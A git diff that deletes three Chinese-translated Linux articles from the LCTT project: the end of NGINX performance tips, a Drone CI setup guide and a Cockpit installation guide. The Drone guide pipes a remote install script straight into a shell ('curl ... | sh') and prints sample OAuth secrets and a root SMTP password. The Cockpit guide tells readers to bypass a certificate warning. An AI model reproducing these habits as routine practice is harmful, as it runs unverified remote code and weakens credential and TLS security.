-- **套接字分割**。通常一个套接字监听器会把新连接分配给所有工人进程。套接字分割会未每个工人进程创建一个套接字监听器,这样一来以内核分配连接给套接字就成为可能了。折可以减少锁竞争,并且提高多核系统的性能,要使能[套接字分隔][43]需要在监听指令里面加上复用端口参数。
-- **线程池**。一个计算机进程可以处理一个缓慢的操作。对于web 服务器软件来说磁盘访问会影响很多更快的操作,比如计算或者在内存中拷贝。使用了线程池之后慢操作可以分配到不同的任务集,而主进程可以一直运行快速操作。当磁盘操作完成后结果会返回给主进程的循环。在NGINX理有两个操作——read()系统调用和sendfile() ——被分配到了[线程池][44]
-
-![Thread pools help increase application performance by assigning a slow operation to a separate set of tasks](https://www.nginx.com/wp-content/uploads/2015/10/Graph-17.png)
-
-**技巧**。当改变任务操作系统或支持服务的设置时,一次只改变一个参数然后测试性能。如果修改引起问题了,或者不能让你的系统更快那么就改回去。
-
-在[blog][45]可以看到更详细的NGINX 调优方法。
-
-### Tip #10: 监视系统活动来解决问题和瓶颈 ###
-
-在应用开发中要使得系统变得非常高效的关键是监视你的系统在现实世界运行的性能。你必须能通过特定的设备和你的web 基础设施上监控程序活动。
-
-监视活动是最积极的——他会告诉你发生了什么,把问题留给你发现和最终解决掉。
-
-监视可以发现集中不同的问题。它们包括:
-
-- 服务器宕机。
-- 服务器出问题一直在丢失连接。
-- 服务器出现大量的缓存未命中。
-- 服务器没有发送正确的内容。
-
-应用的总体性能监控工具,比如New Relic 和Dynatrace,可以帮助你监控到从远处加载网页的时间,二NGINX 可以帮助你监控到应用发送的时 间。当你需要考虑为基础设施添加容量以满足流量需求时,应用性能数据可以告诉你你的优化措施的确起作用了。
-
-为了帮助开发者快速的发现、解决问题,NGINX Plus 增加了[应用感知健康度检查][46] ——对重复出现的常规事件进行综合分析并在问题出现时向你发出警告。NGINX Plus 同时提供[会话过滤][47] 功能,折可以组织当前任务未完成之前不接受新的连接,另一个功能是慢启动,允许一个从错误恢复过来的服务器追赶上负载均衡服务器群的速度。当有使用得当时,健康度检查可以让你在问题变得严重到影响用户体验前就发现它,而会话过滤和慢启动可以让你替换服务器,并且这个过程不会对性能和正常运行时间产生负面影响。这个表格就展示了NGINX Plus 内建模块在web 基础设施[监视活活动][48]的仪表盘,包括了服务器群,TCP 连接和缓存等信息。
-
-![Use real-time application performance monitoring tools to identify and resolve issues quickly](https://www.nginx.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-05-at-4.16.32-PM.png)
-
-### 总结: 看看10倍性能提升的效果 ###
-
-这些性能提升方案对任何一个web 应用都可用并且效果都很好,而实际效果取决于你的预算,如你能花费的时间,目前实现方案的差距。所以你该如何对你自己的应用实现10倍性能提升?
-
-为了指导你了解每种优化手段的潜在影响,这里是是上面详述的每个优化方法的关键点,虽然你的里程肯定大不相同:
-
-- **反向代理服务器和负载均衡**。没有负载均衡或者负载均衡很差都会造成间断的极低性能。增加一个反向代理,比如NGINX可以避免web应用程序在内存和磁盘之间抖动。负载均衡可以将过载服务器的任务转移到空闲的服务器,还可以轻松的进行扩容。这些改变都可以产生巨大的性能提升,很容易就可以比你现在的实现方案的最差性能提高10倍,对于总体性能来说可能提高的不多,但是也是有实质性的提升。
-- **缓存动态和静态数据**。如果你又一个web 服务器负担过重,那么毫无疑问肯定是你的应用服务器,只通过缓存动态数据就可以在峰值时间提高10倍的性能。缓存静态文件可以提高个位数倍的性能。
-- **压缩数据**。使用媒体文件压缩格式,比如图像格式JPEG,图形格式PNG,视频格式MPEG-4,音乐文件格式MP3可以极大的提高性能。一旦这些都用上了,然后压缩文件数据可以提高初始页面加载速度提高两倍。
-- **优化SSL/TLS**。安全握手会对性能产生巨大的影响,对他们的优化可能会对初始响应特别是重文本站点产生2倍的提升。优化SSL/TLS 下媒体文件只会产生很小的性能提升。
-- **使用HTTP/2 和SPDY*。当你使用了SSL/TLS,这些协议就可以提高整个站点的性能。
-- **对linux 和web 服务器软件进行调优**。比如优化缓存机制,使用保活连接,分配时间敏感型任务到不同的线程池可以明显的提高性能;举个例子,线程池可以加速对磁盘敏感的任务[近一个数量级][49].
-
-我们希望你亲自尝试这些技术。我们希望这些提高应用性能的手段可以被你实现。请在下面评论栏分享你的结果 或者在标签#NGINX 和#webperf 下tweet 你的故事。
-### 网上资源 ###
-
-[Statista.com – Share of the internet economy in the gross domestic product in G-20 countries in 2016][50]
-
-[Load Impact – How Bad Performance Impacts Ecommerce Sales][51]
-
-[Kissmetrics – How Loading Time Affects Your Bottom Line (infographic)][52]
-
-[Econsultancy – Site speed: case studies, tips and tools for improving your conversion rate][53]
-
---------------------------------------------------------------------------------
-
-via: https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io
-
-作者:[Floyd Smith][a]
-译者:[Ezio]](https://github.com/oska874)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.nginx.com/blog/author/floyd/
-[1]:https://www.nginx.com/resources/glossary/reverse-proxy-server
-[2]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip2
-[3]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip3
-[4]:https://www.nginx.com/products/application-health-checks/
-[5]:https://www.nginx.com/solutions/load-balancing/
-[6]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip1
-[7]:https://www.nginx.com/resources/admin-guide/load-balancer/
-[8]:https://www.nginx.com/blog/load-balancing-with-nginx-plus/
-[9]:https://www.digitalocean.com/community/tutorials/understanding-and-implementing-fastcgi-proxying-in-nginx
-[10]:https://www.nginx.com/blog/five-reasons-use-software-load-balancer/
-[11]:https://www.nginx.com/blog/load-balancing-with-nginx-plus/
-[12]:https://www.nginx.com/resources/ebook/five-reasons-choose-software-load-balancer/
-[13]:https://www.nginx.com/resources/webinars/choose-software-based-load-balancer-45-min/
-[14]:https://www.nginx.com/resources/admin-guide/load-balancer/
-[15]:https://www.nginx.com/products/
-[16]:https://www.nginx.com/blog/nginx-caching-guide/
-[17]:https://www.nginx.com/products/content-caching-nginx-plus/
-[18]:http://nginx.org/en/docs/http/ngx_http_proxy_module.html?&_ga=1.95342300.1348073562.1438712874#proxy_cache_purge
-[19]:https://www.nginx.com/products/live-activity-monitoring/
-[20]:http://nginx.org/en/docs/http/ngx_http_proxy_module.html?&&&_ga=1.61156076.1348073562.1438712874#proxy_cache
-[21]:https://www.nginx.com/resources/admin-guide/content-caching
-[22]:https://www.nginx.com/blog/network-vs-devops-how-to-manage-your-control-issues/
-[23]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip6
-[24]:https://www.nginx.com/resources/admin-guide/compression-and-decompression/
-[25]:http://nginx.org/en/docs/http/ngx_http_gzip_static_module.html
-[26]:https://www.digicert.com/ssl.htm
-[27]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip6
-[28]:http://openssl.org/
-[29]:https://www.nginx.com/blog/nginx-ssl-performance/
-[30]:https://www.nginx.com/blog/improve-seo-https-nginx/
-[31]:http://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_session_cache
-[32]:https://www.nginx.com/resources/admin-guide/nginx-ssl-termination/
-[33]:https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-termination/
-[34]:https://www.nginx.com/resources/datasheet/datasheet-nginx-http2-whitepaper/
-[35]:http://w3techs.com/blog/entry/25_percent_of_the_web_runs_nginx_including_46_6_percent_of_the_top_10000_sites
-[36]:https://www.nginx.com/blog/how-nginx-plans-to-support-http2/
-[37]:https://www.nginx.com/blog/nginx-plus-r7-released/
-[38]:http://nginx.org/en/download.html
-[39]:https://www.nginx.com/products/
-[40]:https://www.nginx.com/blog/tuning-nginx/
-[41]:https://www.nginx.com/blog/http-keepalives-and-web-performance/
-[42]:http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_buffering
-[43]:https://www.nginx.com/blog/socket-sharding-nginx-release-1-9-1/
-[44]:https://www.nginx.com/blog/thread-pools-boost-performance-9x/
-[45]:https://www.nginx.com/blog/tuning-nginx/
-[46]:https://www.nginx.com/products/application-health-checks/
-[47]:https://www.nginx.com/products/session-persistence/#session-draining
-[48]:https://www.nginx.com/products/live-activity-monitoring/
-[49]:https://www.nginx.com/blog/thread-pools-boost-performance-9x/
-[50]:http://www.statista.com/statistics/250703/forecast-of-internet-economy-as-percentage-of-gdp-in-g-20-countries/
-[51]:http://blog.loadimpact.com/blog/how-bad-performance-impacts-ecommerce-sales-part-i/
-[52]:https://blog.kissmetrics.com/loading-time/?wide=1
-[53]:https://econsultancy.com/blog/10936-site-speed-case-studies-tips-and-tools-for-improving-your-conversion-rate/
diff --git a/translated/tech/20151114 How to Setup Drone - a Continuous Integration Service in Linux.md b/translated/tech/20151114 How to Setup Drone - a Continuous Integration Service in Linux.md
deleted file mode 100644
index 077c945b9c..0000000000
--- a/translated/tech/20151114 How to Setup Drone - a Continuous Integration Service in Linux.md
+++ /dev/null
@@ -1,317 +0,0 @@
-如何在linux 上配置持续集成服务 - Drone
-==============================================================
-
-如果你对一次又一次的克隆、构建、测试和部署代码感到厌倦了,可以考虑一下持续集成。持续集成也就是CI,是软件工程的像我们一样的频繁提交的代码库,构建、测试和部署的实践。CI 帮助我们快速的集成新代码到已有的代码基线。如果这个过程是自动化进行的,那么就会提高开发的速度,因为这可以减少开发人员手工构建和测试的时间。[Drone][1] 是一个免费的开源项目,用来提供一个非常棒的持续集成服务的环境,采用了Apache 2.0 协议。它已经集成近很多代码库提供商,比如Github、Bitbucket 以及Google COde,并且它可以从代码库提取代码,使我们可以编译多种语言,包括PHP, Node, Ruby, Go, Dart, Python, C/C++, JAVA 等等。它是如此一个强大的平台是因为它每次构建都使用了容器和docker 技术,这让用户可以在保证隔离的条件下完全控制他们自己的构建环境。
-
-### 1. 安装 Docker ###
-
-首先,我们要安装docker,因为这是Drone 的工作流的最关键的元素。Drone 合理的利用了docker 来构建和测试应用。容器技术提高了应用部署的效率。要安装docker ,我们需要在不同的linux 发行版本运行下面对应的命令,我们这里会说明Ubuntu 14.04 和CentOS 7 两个版本。
-
-#### Ubuntu ####
-
-要在Ubuntu 上安装Docker ,我们只需要运行下面的命令。
-
- # apt-get update
- # apt-get install docker.io
-
-安装之后我们需要使用`service` 命令重启docker 引擎。
-
- # service docker restart
-
-然后我们让docker 在系统启动时自动启动。
-
- # update-rc.d docker defaults
-
- Adding system startup for /etc/init.d/docker ...
- /etc/rc0.d/K20docker -> ../init.d/docker
- /etc/rc1.d/K20docker -> ../init.d/docker
- /etc/rc6.d/K20docker -> ../init.d/docker
- /etc/rc2.d/S20docker -> ../init.d/docker
- /etc/rc3.d/S20docker -> ../init.d/docker
- /etc/rc4.d/S20docker -> ../init.d/docker
- /etc/rc5.d/S20docker -> ../init.d/docker
-
-#### CentOS ####
-
-第一,我们要更新机器上已经安装的软件包。我们可以使用下面的命令。
-
- # sudo yum update
-
-要在centos 上安装docker,我们可以简单的运行下面的命令。
-
- # curl -sSL https://get.docker.com/ | sh
-
-安装好docker 引擎之后我么只需要简单实用下面的`systemd` 命令启动docker,因为centos 7 的默认init 系统是systemd。
-
- # systemctl start docker
-
-然后我们要让docker 在系统启动时自动启动。
-
- # systemctl enable docker
-
- ln -s '/usr/lib/systemd/system/docker.service' '/etc/systemd/system/multi-user.target.wants/docker.service'
-
-### 2. 安装 SQlite 驱动 ###
-
-Drone 默认使用SQLite3 数据库服务器来保存数据和信息。它会在/var/lib/drone/ 自动创建名为drone.sqlite 的数据库来处理数据库模式的创建和迁移。要安装SQLite3 我们要完成以下几步。
-
-#### Ubuntu 14.04 ####
-
-因为SQLite3 存在于Ubuntu 14.04 的默认软件库,我们只需要简单的使用apt 命令安装它。
-
- # apt-get install libsqlite3-dev
-
-#### CentOS 7 ####
-
-要在Centos 7 上安装选哟使用下面的yum 命令。
-
- # yum install sqlite-devel
-
-### 3. 安装 Drone ###
-
-最后,我们安装好依赖的软件,我们现在更进一步的接近安装Drone。在这一步里我们值简单的从官方链接下载对应的二进制软件包,然后使用默认软件包管理器安装Drone。
-
-#### Ubuntu ####
-
-我们将使用wget 从官方的[Debian 文件下载链接][2]下载drone 的debian 软件包。下面就是下载命令。
-
- # wget downloads.drone.io/master/drone.deb
-
- Resolving downloads.drone.io (downloads.drone.io)... 54.231.48.98
- Connecting to downloads.drone.io (downloads.drone.io)|54.231.48.98|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 7722384 (7.4M) [application/x-debian-package]
- Saving to: 'drone.deb'
- 100%[======================================>] 7,722,384 1.38MB/s in 17s
- 2015-11-06 14:09:28 (456 KB/s) - 'drone.deb' saved [7722384/7722384]
-
-下载好之后,我们将使用dpkg 软件包管理器安装它。
-
- # dpkg -i drone.deb
-
- Selecting previously unselected package drone.
- (Reading database ... 28077 files and directories currently installed.)
- Preparing to unpack drone.deb ...
- Unpacking drone (0.3.0-alpha-1442513246) ...
- Setting up drone (0.3.0-alpha-1442513246) ...
- Your system ubuntu 14: using upstart to control Drone
- drone start/running, process 9512
-
-#### CentOS ####
-
-在CentOS 机器上我们要使用wget 命令从[下载链接][3]下载RPM 包。
-
- # wget downloads.drone.io/master/drone.rpm
-
- --2015-11-06 11:06:45-- http://downloads.drone.io/master/drone.rpm
- Resolving downloads.drone.io (downloads.drone.io)... 54.231.114.18
- Connecting to downloads.drone.io (downloads.drone.io)|54.231.114.18|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 7763311 (7.4M) [application/x-redhat-package-manager]
- Saving to: ‘drone.rpm’
- 100%[======================================>] 7,763,311 1.18MB/s in 20s
- 2015-11-06 11:07:06 (374 KB/s) - ‘drone.rpm’ saved [7763311/7763311]
-
-然后我们使用yum 安装rpm 包。
-
- # yum localinstall drone.rpm
-
-### 4. 配置端口 ###
-
-安装完成之后,我们要使它工作要先进行配置。drone 的配置文件在**/etc/drone/drone.toml** 。默认情况下drone 的web 接口使用的是80,而这也是http 默认的端口,如果我们要下面所示的修改配置文件里server 块对应的值。
-
- [server]
- port=":80"
-
-### 5. 集成 Github ###
-
-为了运行Drone 我们必须设置最少一个和GitHub、GitHub 企业版,Gitlab,Gogs,Bitbucket 关联的集成点。在本文里我们只集成了github,但是如果哦我们要集成其他的我们可以在配置文件做修改。为了集成github 我们需要在[github setting] 创建一个新的应用。
-
-![Registering App Github](http://blog.linoxide.com/wp-content/uploads/2015/11/registering-app-github.png)
-
-要创建一个应用,我们需要在`New Application` 页面点击`Register`,然后如下所示填表。
-
-![Registering OAuth app github](http://blog.linoxide.com/wp-content/uploads/2015/11/registering-OAuth-app-github.png)
-
-我们应该保证在应用的配置项里设置了**授权了的回调链接**,链接看起来像`http://drone.linoxide.com/api/auth/github.com`。然后我们点击注册应用。所有都做好之后我们会看到我们需要在我们的Drone 配置文件里配置的客户端ID 和客户端密钥。
-
-![Client ID and Secret Token](http://blog.linoxide.com/wp-content/uploads/2015/11/client-id-secret-token.png)
-
-在这些都完成之后我们需要使用文本编辑器编辑drone 配置文件,比如使用下面的命令。
-
- # nano /etc/drone/drone.toml
-
-然后我们会在drone 的配置文件里面找到`[github]` 部分,紧接着的是下面所示的配置内容
-
- [github]
- client="3dd44b969709c518603c"
- secret="4ee261abdb431bdc5e96b19cc3c498403853632a"
- # orgs=[]
- # open=false
-
-![Configuring Github Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-github-drone-e1446835124465.png)
-
-### 6. 配置 SMTP 服务器 ###
-
-如果我们想让drone 使用email 发送通知,那么我们需要在SMTP 配置里面设置我们的SMTP 服务器。如果我们已经有了一个SMTP 服务,那就只需要简单的使用它的配置文件就行了,但是因为我们没有一个SMTP 服务器,我们需要安装一个MTA 比如Postfix,然后在drone 配置文件里配置好SMTP。
-
-#### Ubuntu ####
-
-在ubuntu 里使用下面的apt 命令安装postfix。
-
- # apt-get install postfix
-
-#### CentOS ####
-
-在CentOS 里使用下面的yum 命令安装postfix。
-
- # yum install postfix
-
-安装好之后,我们需要编辑我们的postfix 配置文件。
-
- # nano /etc/postfix/main.cf
-
-然后我们要把myhostname 的值替换为我们自己的FQDN,比如drone.linoxide.com。
-
- myhostname = drone.linoxide.com
-
-现在开始配置drone 配置文件里的SMTP 部分。
-
- # nano /etc/drone/drone.toml
-
-找到`[smtp]` 部分补充上下面的内容。
-
- [smtp]
- host = "drone.linoxide.com"
- port = "587"
- from = "root@drone.linoxide.com"
- user = "root"
- pass = "password"
-
-![Configuring SMTP Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-smtp-drone.png)
-
-注意:这里的**user** 和 **pass** 参数强烈推荐一定要改成一个用户的配置。
-
-### 7. 配置 Worker ###
-
-如我们所知的drone 利用了docker 完成构建、测试任务,我们需要把docker 配置为drone 的worker。要完成这些需要修改drone 配置文件里的`[worker]` 部分。
-
- # nano /etc/drone/drone.toml
-
-然后取消底下几行的注释并且补充上下面的内容。
-
- [worker]
- nodes=[
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock"
- ]
-
-这里我们只设置了两个节点,这意味着上面的配置文件只能同时执行2 个构建操作。要提高并发性可以增大节点的值。
-
- [worker]
- nodes=[
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock"
- ]
-
-使用上面的配置文件drone 被配置为使用本地的docker 守护程序可以同时构建4个任务。
-
-### 8. 重启 Drone ###
-
-最后,当所有的安装和配置都准备好之后,我们现在要在本地的linux 机器上启动drone 服务器。
-
-#### Ubuntu ####
-
-因为ubuntu 14.04 使用了sysvinit 作为默认的init 系统,所以只需要简单执行下面的service 命令就可以启动drone 了。
-
- # service drone restart
-
-要让drone 在系统启动时也自动运行,需要运行下面的命令。
-
- # update-rc.d drone defaults
-
-#### CentOS ####
-
-因为CentOS 7使用systemd 作为init 系统,所以只需要运行下面的systemd 命令就可以重启drone。
-
- # systemctl restart drone
-
-要让drone 自动运行只需要运行下面的命令。
-
- # systemctl enable drone
-
-### 9. 添加防火墙例外 ###
-
-众所周知drone 默认使用了80 端口而我们又没有修改他,所以我们需要配置防火墙程序允许80 端口(http)开发并允许其他机器可以通过网络连接。
-
-#### Ubuntu 14.04 ####
-
-iptables 是最流行的防火墙程序,并且ubuntu 默认安装了它。我们需要修改iptable 暴露端口80,这样我们才能让drone 的web 界面在网络上被大家访问。
-
- # iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
- # /etc/init.d/iptables save
-
-#### CentOS 7 ####
-
-因为CentOS 7 默认安装了systemd,它使用firewalld 作为防火墙程序。为了在firewalld 上打开80端口(http 服务),我们需要执行下面的命令。
-
- # firewall-cmd --permanent --add-service=http
-
- success
-
- # firewall-cmd --reload
-
- success
-
-### 10. 访问web 界面 ###
-
-现在我们将在我们最喜欢的浏览器上通过web 界面打开drone。要完成这些我们要把浏览器指向运行drone 的服务器。因为drone 默认使用80 端口而我们有没有修改过,所以我们只需要在浏览器里根据我们的配置输入`http://ip-address/` 或 `http://drone.linoxide.com` 就行了。在我们正确的完成了上述操作后,我们就可以看到登陆界面了。
-
-![Login Github Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/login-github-drone-e1446834688394.png)
-
-因为在上面的步骤里配置了Github,我们现在只需要简单的选择github然后进入应用授权步骤,这些完成后我们就可以进入工作台了。
-
-![Drone Dashboard](http://blog.linoxide.com/wp-content/uploads/2015/11/drone-dashboard.png)
-
-这里它会同步我们在github 上的代码库,然后询问我们要在drone 上构建那个代码库。
-
-![Activate Repository](http://blog.linoxide.com/wp-content/uploads/2015/11/activate-repository-e1446835574595.png)
-
-这一步完成后,它会询问我们在代码库里添加`.drone.yml` 文件的新名称,并且在这个文件里定义构建的过程和配置项,比如使用那个docker 镜像,执行那些命令和脚本来编译,等等。
-
-我们按照下面的内容来配置我们的`.drone.yml`。
-
- image: python
- script:
- - python helloworld.py
- - echo "Build has been completed."
-
-这一步完成后我们就可以使用drone 应用里的YAML 格式的配置文件来构建我们的应用了。所有对代码库的提交和改变此时都会同步到这个仓库。一旦提交完成了,drone 就会自动开始构建。
-
-![Building Application Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/building-application-drone.png)
-
-所有操作都完成后,我们就能在终端看到构建的结果了。
-
-![Build Success Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/build-success-drone.png)
-
-### 总结 ###
-
-在本文中我们学习了如何安装一个可以工作的使用drone 的持续集成平台。如果我们愿意我们甚至可以从drone.io 官方提供的服务开始工作。我们可以根据自己的需求从免费的服务或者收费服务开始。它通过漂亮的web界面和强大的功能改变了持续集成的世界。它可以集成很多第三方应用和部署平台。如果你有任何问题、建议可以直接反馈给我们,谢谢。
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/setup-drone-continuous-integration-linux/
-
-作者:[Arun Pyasi][a]
-译者:[ezio](https://github.com/oska874)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:https://drone.io/
-[2]:http://downloads.drone.io/master/drone.deb
-[3]:http://downloads.drone.io/master/drone.rpm
-[4]:https://github.com/settings/developers
diff --git a/translated/tech/20151123 How to Install Cockpit in Fedora or CentOS or RHEL or Arch Linux.md b/translated/tech/20151123 How to Install Cockpit in Fedora or CentOS or RHEL or Arch Linux.md
deleted file mode 100644
index 38a89dcbc2..0000000000
--- a/translated/tech/20151123 How to Install Cockpit in Fedora or CentOS or RHEL or Arch Linux.md
+++ /dev/null
@@ -1,148 +0,0 @@
-如何在 Fedora/CentOS/RHEL 或 Arch Linux 上安装 Cockpit
-================================================================================
-Cockpit 是一个免费开源的服务器管理软件,它使得我们可以通过它好看的 web 前端界面轻松地管理我们的 GNU/Linux 服务器。Cockpit 使得 linux 系统管理员、系统维护员和开发者能轻松地管理他们的服务器并执行一些简单的任务,例如管理存储、检测日志、启动或停止服务以及一些其它任务。它的报告界面添加了一些很好的功能使得可以轻松地在终端和 web 界面之间切换。另外,它不仅使得管理一台服务器变得简单,更重要的是只需要一个单击就可以在一个地方同时管理多个通过网络连接的服务器。它非常轻量级,web 界面也非常简单易用。在这篇博文中,我们会学习如何安装 Cockpit 并用它管理我们的运行着 Fedora、CentOS、Arch Linux 以及 RHEL 发行版操作系统的服务器。下面是 Cockpit 在我们的 GNU/Linux 服务器中一些非常棒的功能:
-
-1. 它包含 systemd 服务管理器。
-2. 有一个用于故障排除和日志分析的 Journal 日志查看器。
-3. 包括 LVM 在内的存储配置比以前任何时候都要简单。
-4. 用 Cockpit 可以进行基本的网络配置。
-5. 可以轻松地添加和删除用户以及管理多台服务器。
-
-### 1. 安装 Cockpit ###
-
-首先,我们需要在我们基于 linux 的服务器上安装 Cockpit。大部分发行版的官方软件仓库中都有可用的 cockpit 安装包。这篇博文中,我们会在 Fedora 22、CentOS 7、Arch Linux 和 RHEL 7 中通过它们的官方软件仓库安装 Cockpit。
-
-#### CentOS / RHEL ####
-
-CentOS 和 RHEL 官方软件库中有可用的 Cockpit。我们只需要用 yum 管理器就可以安装。只需要以 sudo/root 权限运行下面的命令就可以安装它。
-
- # yum install cockpit
-
-![Centos 上安装 Cockpit](http://blog.linoxide.com/wp-content/uploads/2015/10/install-cockpit-centos.png)
-
-#### Fedora 22/21 ####
-
-和 CentOS 一样, Fedora 的官方软件库默认也有可用的 Cockpit。我们只需要用 dnf 软件包管理器就可以安装 Cockpit。
-
- # dnf install cockpit
-
-![Fedora 上安装 Cockpit](http://blog.linoxide.com/wp-content/uploads/2015/10/install-cockpit-fedora.png)
-
-#### Arch Linux ####
-
-现在 Arch Linux 官方软件库中还没有可用的 Cockpit,但 Arch 用户库(Arch User Repository,AUR)有。只需要运行下面的 yaourt 命令就可以安装。
-
- # yaourt cockpit
-
-![Arch linux 上安装 Cockpit](http://blog.linoxide.com/wp-content/uploads/2015/10/install-cockpit-archlinux.png)
-
-### 2. 启动并启用 Cockpit ###
-
-成功安装完 Cockpit,我们就要用服务/守护进程管理器启动 Cockpit 服务。到了 2015 年,尽管一些 linux 发行版仍然运行 SysVinit 管理守护进程,但大部分 linux 发行版都采用了 Systemd,Cockpit 使用 systemd 完成从运行守护进程到服务几乎所有的功能。因此,我们只能在运行着 Systemd 的最新的 linux 发行版中安装 Cockpit。要启动 Cockpit 并让它在每次系统重启时自动启动,我们需要在终端或控制台中运行下面的命令。
- # systemctl start cockpit
-
- # systemctl enable cockpit.socket
-
- 创建从 /etc/systemd/system/sockets.target.wants/cockpit.socket 到 /usr/lib/systemd/system/cockpit.socket 的符号链接。
-
-### 3. 允许通过防火墙 ###
-
-启动 Cockpit 并使得它能在每次系统重启时自动启动后,我们现在要给它配置防火墙。由于我们的服务器上运行着防火墙程序,我们需要允许它通过某些端口使得从服务器外面可以访问 Cockpit。
-
-#### Firewalld ####
-
- # firewall-cmd --add-service=cockpit --permanent
-
- success
-
- # firewall-cmd --reload
-
- success
-
-![允许 Cockpit 通过 Firewalld](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-allowing-firewalld.png)
-
-#### Iptables ####
-
- # iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-
- # service iptables save
-
-### 4. 访问 Cockpit Web 界面 ###
-
-下面,我们终于要通过 web 浏览器访问 Cockpit web 界面了。根据配置,我们只需要用浏览器打开 https://ip-address:9090 或 https://server.domain.com:9090。在我们这篇博文中,我们用浏览器打开 https://128.199.114.17:9090,正如下图所示。
-
-![通过 SSL 访问 Cockpit Web 服务](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-webserver-ssl-proceed.png)
-
-此时会出现一个 SSL 认证警告,因为我们正在使用一个自签名认证。我们只需要忽略这个警告并进入到登录页面,在 chrome/chromium 中,我们需要点击 Show Advanced 然后点击 **Proceed to 128.199.114.17 (unsafe)**。
-
-![Cockpit 登录界面](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-login-screen.png)
-
-现在,要进入仪表盘,我们需要输入详细的登录信息。这里,用户名和密码和用于登录我们的 linux 服务器的用户名和密码相同。当我们输入登录信息并点击 Log In 按钮后,我们就会进入到 Cockpit 仪表盘。
-
-![Cockpit 仪表盘](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-dashboard.png)
-
-这里我们可以看到所有的菜单以及 CPU、磁盘、网络、存储使用情况的可视化结果。仪表盘正如上图所示。
-
-#### 服务 ####
-
-要管理服务,我们需要点击 web 页面右边菜单中的 Services 按钮。然后,我们会看到服务被分成了 5 个类别,目标、系统服务、套接字、计时器和路径。
-
-![Cockpit 服务](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-services.png)
-
-#### Docker 容器 ####
-
-我们甚至可以用 Cockpit 管理 docker 容器。用 Cockpit 监控和管理 Docker 容器非常简单。由于我们的服务器中没有安装运行 docker,我们需要点击 Start Docker。
-
-
-![Cockpit 容器](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-container.png)
-
-Cockpit 会自动在我们的服务器上安装和运行 docker。启动之后,我们就会看到下面的截图。然后我们就可以按照需求管理 docker 镜像、容器。
-
-![Cockpit 容器管理](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-containers-mangement.png)
-
-#### Journal 日志查看器 ####
-
-Cockpit 有个日志查看器,它把错误、警告、注意分到不同的标签页。我们也有一个 All 标签页,在这里可以看到所有的日志信息。
-
-![Cockpit Journal 日志](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-journal-logs.png)
-
-#### 网络 ####
-
-在网络部分,我们可以看到两个可视化发送和接收速度的图。我们可以看到这里有一个可用网卡的列表,还有 Add Bond、Bridge、VLAN 的选项。如果我们需要配置一个网卡,我们只需要点击网卡名称。在下面,我们可以看到网络的 Journal 日志信息。
-
-![Cockpit Network](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-network.png)
-
-#### 存储 ####
-
-现在,用 Cockpit 可以方便地查看硬盘的读写速度。我们可以查看存储的 Journal 日志以便进行故障排除和修复。在页面中还有一个已用空间的可视化图。我们甚至可以卸载、格式化、删除一块硬盘的某个分区。它还有类似创建 RAID 设备、卷组等攻能。
-
-![Cockpit Storage](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-storage.png)
-
-#### 用户管理 ####
-
-通过 Cockpit Web 界面我们可以方便地创建新用户。在这里创建的账户会应用到系统用户账户。我们可以用它更改密码、指定角色、以及删除用户账户。
-
-![Cockpit Accounts](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-accounts.png)
-
-#### 实时终端 ####
-
-Cockpit 还有一个很棒的特性。是的,我们可以执行命令,用 Cockpit 界面提供的实时终端执行任务。这使得我们可以根据我们的需求在 web 界面和终端之间自由切换。
-
-![Cockpit 终端](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-terminal.png)
-
-### 总结 ###
-
